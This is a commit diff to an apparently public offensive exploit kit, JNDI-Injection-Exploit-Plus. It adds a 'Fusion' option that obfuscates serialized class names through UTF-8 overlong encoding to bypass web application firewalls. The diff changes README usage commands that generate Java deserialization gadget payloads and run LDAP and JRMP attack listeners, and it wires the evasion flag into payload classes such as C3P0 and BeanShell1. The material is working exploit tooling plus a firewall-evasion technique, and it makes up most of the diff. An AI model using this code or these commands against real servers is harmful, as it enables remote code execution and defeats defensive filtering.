增加绕waf功能：混淆class name

Author: cckuailong

README.md

@@ -135,15 +135,27 @@ JbossRemoting | Jboss Remoting Port Unserialization
 - Example
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
+$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
 ```
 
 ![](./img/4.png)
 
+#### 6. Fusion
+
+Hide class name to bypass WAF.
+
+- Example
+
+```shell
+$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -F
+```
+
+Reference: [https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html](https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html)
+
 #### Web service to return Deserial Gadgets
 
 ```shell
-java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar
+java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar
 ```
 
 ```shell
@@ -163,7 +175,7 @@ P.S. Param wrapper & output is opetional
 Run as
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar [-C] [command] [-A] [address]
+$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar [-C] [command] [-A] [address]
 ```
 
 where:
@@ -193,7 +205,7 @@ Points for attention:
 Run as
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex]
+$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex]
 ```
 
 where:
@@ -211,13 +223,13 @@ where:
 - JRMPListener
 
 ```shell
-java -cp JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
+java -cp JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
 ```
 
 - JRMPClient
 
 ```shell
-java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
+java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
 ```
 
 ## Examples
@@ -229,7 +241,7 @@ Local demo:
 1. Start the tool like this:
 
    ```shell
-   $ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
+   $ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
    ```
 
     Screenshot:
@@ -260,7 +272,7 @@ For More Examples: [Test-JNDI-Injection-Exploit-Plus](https://github.com/cckuail
 ### Deserialization Payloads
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
+$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
 ```
 
 Base64 Output Result:

README_zh.md

@@ -19,7 +19,7 @@ P.S. 具体利用链名称及依赖见 [表格](./README.md)
 #### 使用方法
 
 ```
-$ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar [-C] [command] [-A] [address]
+$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar [-C] [command] [-A] [address]
 ```
 
 #### 参数说明
@@ -39,7 +39,7 @@ $ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar [-C] [command] [-A]
 1. 运行工具
 
 ```
-$ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
+$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
 ```
 
 ![](./img/1.png)
@@ -64,7 +64,7 @@ class Test{
 #### 使用方法
 
 ```
-$ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex]
+$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex]
 ```
 
 #### 参数说明
@@ -84,7 +84,7 @@ $ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar [-C] [command] [-D]
 1. 普通
 
 ```
-$ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
+$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
 ```
 
 ![](./img/3.png)
@@ -93,12 +93,12 @@ $ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar -C "/System/Applica
 
 - JRMPListener
 ```
-java -cp JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
+java -cp JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
 ```
 
 - JRMPClient
 ```
-java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
+java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
 ```
 
 #### 提供反序列化包装器
@@ -112,15 +112,27 @@ JbossRemoting | Jboss Remoting 服务反序列化
 - 示例
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
+$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
 ```
 
 ![](./img/4.png)
 
+#### 混淆
+
+混淆class名字来绕过WAF
+
+- Example
+
+```shell
+$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -F
+```
+
+参考链接：[https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html](https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html)
+
 #### 可以返回反序列化数据的web服务
 
 ```shell
-java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar
+java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar
 ```
 
 ```shell

pom.xml

@@ -6,7 +6,7 @@
 
     <groupId>cckuailong</groupId>
     <artifactId>JNDI-Injection-Exploit-Plus</artifactId>
-    <version>2.2-SNAPSHOT</version>
+    <version>2.3-SNAPSHOT</version>
 
     <properties>
         <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>

src/main/java/common/Serializerable.java

@@ -1,5 +1,7 @@
 package common;
 
+import util.UTF8FusionObjectOutputStream;
+
 import java.io.ByteArrayOutputStream;
 import java.io.IOException;
 import java.io.ObjectOutputStream;
@@ -27,4 +29,15 @@ public static void serialize(final Object obj, final OutputStream out) throws IO
 		objOut.writeObject(obj);
 	}
 
+	public static byte[] serializeFusion(final Object obj) throws IOException {
+		final ByteArrayOutputStream out = new ByteArrayOutputStream();
+		serializeFusion(obj, out);
+		return out.toByteArray();
+	}
+
+	public static void serializeFusion(final Object obj, final OutputStream out) throws IOException {
+		final ObjectOutputStream objOut = new UTF8FusionObjectOutputStream(out);
+		objOut.writeObject(obj);
+	}
+
 }

src/main/java/jetty/JettyServer.java

@@ -268,7 +268,7 @@ public void doPost(HttpServletRequest request, HttpServletResponse response) thr
             CommonDeserial commonDeserial = new CommonDeserial(cmdParam);
             byte[] deserialBytes = new byte[0];
             try {
-                deserialBytes = commonDeserial.execByDeserialize(payloadGadget, wrapper);
+                deserialBytes = commonDeserial.execByDeserialize(payloadGadget, wrapper, false);
             } catch (Exception e) {
                 e.printStackTrace();
             }

src/main/java/jndi/CommonDeserial.java

@@ -12,7 +12,7 @@ public CommonDeserial(String command){
         this.command = command;
     }
 
-    public byte[] execByDeserialize(String gadgetType, String wrapperType) throws Exception {
+    public byte[] execByDeserialize(String gadgetType, String wrapperType, Boolean fusion) throws Exception {
         byte[] bytes = {};
 //        System.out.println(gadgetType);
         final Class<? extends ObjectPayload> payloadClass = ObjectPayload.Utils.getPayloadClass(gadgetType);
@@ -21,11 +21,11 @@ public byte[] execByDeserialize(String gadgetType, String wrapperType) throws Ex
         }
 
         if (wrapperType == null){
-            Method method = payloadClass.getMethod("getBytes", String.class);
-            bytes = (byte[])method.invoke(payloadClass.newInstance(), command);
+            Method method = payloadClass.getMethod("getBytes", String.class, Boolean.class);
+            bytes = (byte[])method.invoke(payloadClass.newInstance(), command, fusion);
         }else if (wrapperType.equals("JbossRemoting")){
-            Method method = payloadClass.getMethod("getBytes", String.class);
-            bytes = (byte[])method.invoke(payloadClass.newInstance(), command);
+            Method method = payloadClass.getMethod("getBytes", String.class, Boolean.class);
+            bytes = (byte[])method.invoke(payloadClass.newInstance(), command, fusion);
             JbossRemotingWrap wrap = new JbossRemotingWrap();
             bytes = wrap.wrap(bytes);
         }else{

src/main/java/jndi/LDAPRefServer.java

@@ -199,7 +199,7 @@ protected void sendResult ( InMemoryInterceptedSearchResult result, String base,
                 }
 
                 String gadgetType = javaFactory.substring(8);
-                byte[] bytes = commonDeserial.execByDeserialize(gadgetType, null);
+                byte[] bytes = commonDeserial.execByDeserialize(gadgetType, null, false);
                 System.out.printf("%s [LDAPSERVER] [%s] >> Send local LDAP reference result\n", getLocalTime(), javaFactory);
                 e.addAttribute("javaClassName", "foo");
                 e.addAttribute("javaSerializedData", bytes);

src/main/java/payloads/AspectJWeaver.java

@@ -98,12 +98,7 @@ public Serializable getObject(final String command) throws Exception {
 
     }
 
-    public static byte[] getBytes(String command) throws Exception {
-        return PayloadRunner.run(AspectJWeaver.class, command);
-    }
-
-    public static void main(String command) throws Exception {
-        command = "ahi.txt;YWhpaGloaQ==";
-        PayloadRunner.run(AspectJWeaver.class, command);
+    public static byte[] getBytes(String command, Boolean fusion) throws Exception {
+        return PayloadRunner.run(AspectJWeaver.class, command, fusion);
     }
 }

src/main/java/payloads/BeanShell1.java

@@ -55,11 +55,7 @@ public PriorityQueue getObject(String command) throws Exception {
 	return priorityQueue;
     }
 
-	public static byte[] getBytes(final String command) throws Exception {
-		return PayloadRunner.run(BeanShell1.class, command);
+	public static byte[] getBytes(final String command, Boolean fusion) throws Exception {
+		return PayloadRunner.run(BeanShell1.class, command, fusion);
 	}
-
-    public static void main(final String command) throws Exception {
-		PayloadRunner.run(BeanShell1.class, command);
-    }
 }

src/main/java/payloads/C3P0.java

@@ -82,12 +82,7 @@ public void setLoginTimeout ( int seconds ) throws SQLException {}
 
     }
 
-    public static byte[] getBytes ( final String command ) throws Exception {
-        return PayloadRunner.run(C3P0.class, command);
+    public static byte[] getBytes (final String command, Boolean fusion) throws Exception {
+        return PayloadRunner.run(C3P0.class, command, fusion);
     }
-
-    public static void main ( final String command ) throws Exception {
-        PayloadRunner.run(C3P0.class, command);
-    }
-
 }